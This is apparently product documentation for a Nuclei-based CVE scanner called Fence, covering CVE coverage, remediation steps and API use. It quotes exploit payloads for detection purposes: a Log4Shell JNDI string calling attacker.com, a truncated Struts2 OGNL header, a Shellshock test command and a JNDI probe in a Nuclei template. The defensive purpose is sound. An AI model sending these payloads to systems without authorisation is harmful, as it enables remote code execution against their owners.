CVE Detection
Fence uses Nuclei to detect Common Vulnerabilities and Exposures (CVEs) across your infrastructure. Our database includes 3,490+ CVE templates covering vulnerabilities from 2000-2025.
What is a CVE?
CVE (Common Vulnerabilities and Exposures) is a standardized identifier for known security vulnerabilities maintained by MITRE Corporation and the National Vulnerability Database (NVD).
Format: CVE-YEAR-NUMBER
- Example: CVE-2021-44228 (Log4Shell)
Each CVE includes:
- Unique identifier
- Description of the vulnerability
- Affected products/versions
- CVSS severity score (v2, v3, v4)
- References and patches
CVE Coverage
Fence's CVE database covers:
By Year
- 2000-2019: 1,842 critical CVEs
- 2020: 285 CVEs
- 2021: 412 CVEs (Log4Shell, ProxyShell, Spring4Shell)
- 2022: 367 CVEs
- 2023: 294 CVEs
- 2024: 218 CVEs
- 2025: 72 CVEs (updated monthly)
By Category
| Category | Count | Examples |
|---|---|---|
| Remote Code Execution (RCE) | 1,247 | Log4Shell, Shellshock, Struts2 |
| SQL Injection | 438 | Drupalgeddon, WordPress plugins |
| Cross-Site Scripting (XSS) | 392 | Stored XSS in admin panels |
| Authentication Bypass | 284 | Default credentials, broken auth |
| Directory Traversal | 267 | Path traversal, LFI/RFI |
| Information Disclosure | 316 | Config exposure, version leaks |
| Denial of Service (DoS) | 189 | Resource exhaustion, crashes |
| Other | 357 | Deserialization, XXE, SSRF |
By Severity (CVSS v3)
| Severity | CVSS Score | Count | Examples |
|---|---|---|---|
| Critical | 9.0-10.0 | 892 | CVE-2021-44228 (Log4Shell): 10.0 |
| High | 7.0-8.9 | 1,456 | CVE-2014-0160 (Heartbleed): 7.5 |
| Medium | 4.0-6.9 | 987 | CVE-2019-11043 (PHP-FPM RCE): 6.5 |
| Low | 0.1-3.9 | 155 | Minor info disclosure |
Top Critical CVEs Detected
CVE-2021-44228: Log4Shell (Apache Log4j RCE)
CVSS: 10.0 (Critical)
Impact: Remote code execution via JNDI lookup
Affected: Apache Log4j 2.0-beta9 through 2.15.0 (excluding 2.12.2)
Fix: Upgrade to Log4j 2.17.1+
// Exploit vector
${jndi:ldap://attacker.com/exploit}
// Remediation
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.17.1</version>
</dependency>
CVE-2014-0160: Heartbleed (OpenSSL)
CVSS: 7.5 (High)
Impact: Memory disclosure, private key leakage
Affected: OpenSSL 1.0.1 through 1.0.1f
Fix: Upgrade to OpenSSL 1.0.1g+, revoke/reissue certificates
# Check if vulnerable
openssl version
# If 1.0.1 through 1.0.1f, upgrade immediately
# Ubuntu/Debian
sudo apt-get update
sudo apt-get install --only-upgrade openssl libssl1.1
# After patching
# 1. Revoke old certificates
# 2. Generate new private keys
# 3. Reissue certificates
CVE-2017-5638: Apache Struts2 RCE
CVSS: 10.0 (Critical)
Impact: Remote code execution via Content-Type header
Affected: Apache Struts 2.3.5 through 2.3.31, 2.5 through 2.5.10
Fix: Upgrade to Struts 2.3.32 or 2.5.10.1+
# Exploit detection
GET / HTTP/1.1
Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS)...}
# Remediation
# Update pom.xml or build.gradle
<dependency>
<groupId>org.apache.struts</groupId>
<artifactId>struts2-core</artifactId>
<version>2.5.33</version>
</dependency>
CVE-2014-6271: Shellshock (Bash)
CVSS: 10.0 (Critical)
Impact: Remote code execution via environment variables
Affected: GNU Bash through 4.3
Fix: Upgrade to patched Bash version
# Test if vulnerable
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
# If prints "vulnerable", you're affected
# Ubuntu/Debian
sudo apt-get update
sudo apt-get install --only-upgrade bash
# Verify patch
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
# Should only print "this is a test"
CVE-2017-7494: SambaCry (Samba RCE)
CVSS: 10.0 (Critical)
Impact: Remote code execution on Samba file shares
Affected: Samba 3.5.0 through 4.6.4
Fix: Upgrade to Samba 4.6.4+, 4.5.10+, or 4.4.14+
# Check version
smbd --version
# Update Samba
sudo apt-get update
sudo apt-get install --only-upgrade samba
# Verify version
smbd --version # Should be 4.6.4+
Nuclei Template Engine
Fence uses Nuclei templates for CVE detection. Each template includes:
Template Structure
id: CVE-2021-44228
info:
name: Apache Log4j RCE
severity: critical
description: Remote code execution via JNDI injection
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://logging.apache.org/log4j/2.x/security.html
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
X-Api-Version: "${jndi:ldap://{{interactsh-url}}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
Template Categories
- CVE - Known vulnerability exploits (3,490 templates)
- Exposed Panels - Admin panels, dashboards (287 templates)
- Misconfigurations - Default configs, debug mode (412 templates)
- Exposed Tokens - API keys, secrets (156 templates)
Scan Process
- Template Loading - Loads 3,490+ CVE templates
- Target Fingerprinting - Identifies technologies (Apache, Nginx, WordPress, etc.)
- Template Matching - Selects relevant templates based on detected tech
- Payload Execution - Sends test requests with exploit payloads
- Response Analysis - Checks for vulnerability indicators
- Verification - Confirms exploitability (no false positives)
Scan duration: 2-5 minutes per domain
Remediation Workflow
When Fence detects a CVE:
1. Assess Severity
Check CVSS score and exploitability:
- Critical (9.0-10.0): Patch within 24-48 hours
- High (7.0-8.9): Patch within 7 days
- Medium (4.0-6.9): Patch within 30 days
- Low (0.1-3.9): Patch within 90 days
2. Verify Exploitability
- Check if your version is affected
- Confirm the vulnerability exists (not a false positive)
- Assess real-world impact (internal vs. public-facing)
3. Apply Patch
# Example: Patching vulnerable npm package
npm audit # Shows vulnerabilities
npm audit fix # Auto-fix compatible updates
npm audit fix --force # Force breaking changes
# Example: Patching Python package
pip-audit # Shows vulnerabilities
pip install --upgrade package-name==x.y.z
4. Verify Fix
- Re-run Fence scan
- Confirm vulnerability no longer detected
- Check application still functions correctly
5. Document
- Log CVE ID, patch version, date fixed
- Update security documentation
- Notify stakeholders if customer data was at risk
Vulnerability Disclosure
If Fence detects a zero-day (unknown vulnerability):
- Do NOT publicly disclose
- Contact vendor security team
- Allow 90 days for patch development
- Coordinate disclosure with vendor
- Apply patch when available
Responsible disclosure timeline:
- Day 0: Report to vendor
- Day 30: Follow up if no response
- Day 90: Public disclosure (with or without patch)
CVE Intelligence Sources
Fence aggregates CVE data from:
| Source | Description | Update Frequency |
|---|---|---|
| NVD (NIST) | Official CVE database | Daily |
| Nuclei Templates | Community-contributed exploits | Weekly |
| CISA KEV | Known Exploited Vulnerabilities catalog | As published |
| GitHub Advisory | Package-specific vulnerabilities | Daily |
| MITRE CVE | CVE identifier assignments | Daily |
API Integration
Query CVE detections via API (Startup tier+):
# Get all CVEs for a domain
curl -H "Authorization: Bearer YOUR_API_TOKEN" \
https://fence.dev/api/domains/{domain_id}/vulnerabilities/?cve=true
# Get specific CVE
curl -H "Authorization: Bearer YOUR_API_TOKEN" \
https://fence.dev/api/vulnerabilities/?search=CVE-2021-44228
Compliance Requirements
| Standard | CVE Scanning Requirements |
|---|---|
| PCI DSS | Quarterly vulnerability scans by ASV (Approved Scanning Vendor) |
| HIPAA | ยง 164.308(a)(8) - Regular vulnerability assessments |
| NIST 800-53 | RA-5 - Vulnerability scanning and remediation |
| ISO 27001 | A.12.6.1 - Technical vulnerability management |
| SOC 2 | CC7.1 - System monitoring for vulnerabilities |
False Positive Rate
Nuclei templates are highly accurate:
- Overall false positive rate: ~3-5%
- Critical CVEs: <1% false positive rate
- Medium/Low CVEs: ~5-10% false positive rate
Mark false positives in Fence to improve accuracy.